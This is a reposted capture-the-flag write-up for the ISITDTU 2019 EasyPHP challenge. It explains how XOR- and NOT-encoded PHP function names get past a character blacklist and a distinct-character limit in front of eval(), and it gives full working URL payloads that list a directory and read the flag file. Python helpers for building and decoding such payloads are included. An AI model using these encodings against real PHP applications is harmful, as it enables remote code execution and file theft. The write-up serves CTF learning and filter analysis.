
[ISITDTU 2019]EasyPHP

2022-06-11 16:21:00 Game programming

I have been slacking off recently. I don't know what to do every day and I can't calm down to work on challenges. I did this challenge today, and in the end my understanding of it was still fuzzy, so I am writing this write-up to reinforce the knowledge points and consolidate the material on RCE without alphanumeric characters. This challenge involves only a small point; to learn more about bypass techniques, read p God's article.

Start the target and view the source code:

<?php
highlight_file(__FILE__);

$_ = @$_GET['_'];
if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )
    die('rosé will not do it');

if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )
    die('you are so close, omg');

eval($_);
?>

The source code means we have to get past two if checks, after which eval executes our input.

The first check is the regular expression:
\x00- 0-9 matches \x00 through space (\x20) and the digits 0-9.
'"`$&.,|[{_defgops\x7F matches the characters '"`$&.,|[{_defgops and the DEL character (\x7F).

The second check: the count_chars() function returns information about the characters used in a string (in mode 3 it returns a string containing all the different characters used in the argument). In other words, the input cannot contain more than 13 different characters.

First, use the following script to look for built-in functions that satisfy both checks. After checking, it turns out that there is no usable function:

<?php
$array=get_defined_functions();// Returns all built-in defined functions
foreach($array['internal'] as $arr){
if ( preg_match('/[\x00- 0-9\'"\`$&.,|[{_defgops\x7F]+/i', $arr) ) continue;
if ( strlen(count_chars(strtolower($arr), 0x3)) > 0xd ) continue;
print($arr.'<br/>');
}
?>

Here we try to get around the checks with bitwise NOT or XOR. Try phpinfo() first:

php -r "echo urlencode(~'phpinfo');"

From the information obtained, we can see that most functions are filtered. Here we use print_r(scandir(.)) to read the directory:

(~%8F%8D%96%91%8B%A0%8D)((~%8C%9C%9E%91%9B%96%8D)(~%D1));

This cannot get past the second check. To make substitution easier, use the XOR-with-%FF form combined with character substitution to bypass it. print_r(scandir(.)) becomes:

((%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));

I had no patience to work this out, so I read an expert's article directly: [ISITDTU 2019]EasyPHP, fmyyy1's blog on CSDN.

First, test the length locally:

<?php
$_ = $_GET['_'];
echo strlen(count_chars($_,3));

The length turns out to be 16, so we need to find a way to remove 3 characters.

Use the method from the article directly to do the substitution:

chars = 'acdips'   # characters we keep in the payload
target = 'ntr'     # characters to express as an XOR of three kept characters
for m in target:
    for a in chars:
        for b in chars:
            for c in chars:
                if ord(a) ^ ord(b) ^ ord(c) == ord(m):
                    print("{} = {}^{}^{}".format(m, a, b, c))

n = c^d^i
t = c^d^s
r = a^c^p

Using print_r to illustrate:

(%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF)

With the corresponding n, t and r replaced, it becomes:

(%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF)

After substitution, the payload becomes:

((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));

Testing shows the length is now 13, which meets the requirement. The payload is:

?_=((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));

The flag turns out to be at the end of the array, so use readfile(end(scandir(.))) to read it. The construction method is the same as above. The final payload is:

?_=((%8D%9A%9E%9B%99%96%93%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))(((%9A%9E%9B)^(%FF%99%FF)^(%FF%96%FF)^(%FF%FF%FF))(((%8D%9E%9E%9E%9B%96%8D)^(%9A%9B%FF%99%FF%FF%FF)^(%9B%99%FF%96%FF%FF%FF)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));
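To check the 16 and 13 character counts offline, and to see what such a request decodes to when it turns up in a log, here is an added example (not from the original post or the referenced article) that reimplements the two checks in Python and XORs each operand chain back into a name. The names `filter_verdict` and `reveal` are this example's own; the two payload strings are copied from the write-up above.

```python
import re
from functools import reduce
from operator import xor
from urllib.parse import unquote_to_bytes

# The challenge's blacklist as a bytes pattern (the PHP regex runs without /u).
BLACKLIST = re.compile(rb"[\x00- 0-9'\"`$&.,|\[{_defgops\x7F]", re.I)
MAX_DISTINCT = 0xD

# One parenthesised run of high bytes XORed with one or more further runs.
CHAIN = re.compile(rb"\([\x80-\xff]+\)(?:\^\([\x80-\xff]+\))+")
OPERAND = re.compile(rb"\(([\x80-\xff]+)\)")

# Both strings are copied from the write-up above.
XOR_FF = ("((%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF))"
          "(((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));")
SUBSTITUTED = (
    "((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)"
    "^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))"
    "(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)"
    "^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));")


def filter_verdict(query_value):
    """Return (hits_blacklist, distinct_bytes, reaches_eval) for a raw query value."""
    raw = unquote_to_bytes(query_value)      # PHP URL-decodes $_GET first
    hits = BLACKLIST.search(raw) is not None
    distinct = len(set(raw.lower()))         # count_chars(strtolower($_), 3)
    return hits, distinct, (not hits and distinct <= MAX_DISTINCT)


def reveal(query_value):
    """XOR each operand chain byte-wise, as PHP's string ^ does, to show the names."""
    raw = unquote_to_bytes(query_value)
    names = []
    for chain in CHAIN.finditer(raw):
        operands = OPERAND.findall(chain.group())
        # zip() stops at the shortest operand, matching PHP's truncation.
        names.append(bytes(reduce(xor, col) for col in zip(*operands)).decode("latin-1"))
    return names


if __name__ == "__main__":
    for label, value in (("xor-ff", XOR_FF), ("substituted", SUBSTITUTED)):
        print(label, filter_verdict(value), reveal(value))
```

Both forms decode to the same three strings, but only the substituted one stays within 13 distinct bytes, which is why a blacklist plus a character-count limit in front of eval() does not contain the input.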
Author: ahik1


Copyright notice
This article was created by [Game programming]. Please include the original link when reposting. Thank you.
https://yzsam.com/2022/162/202206111607543428.html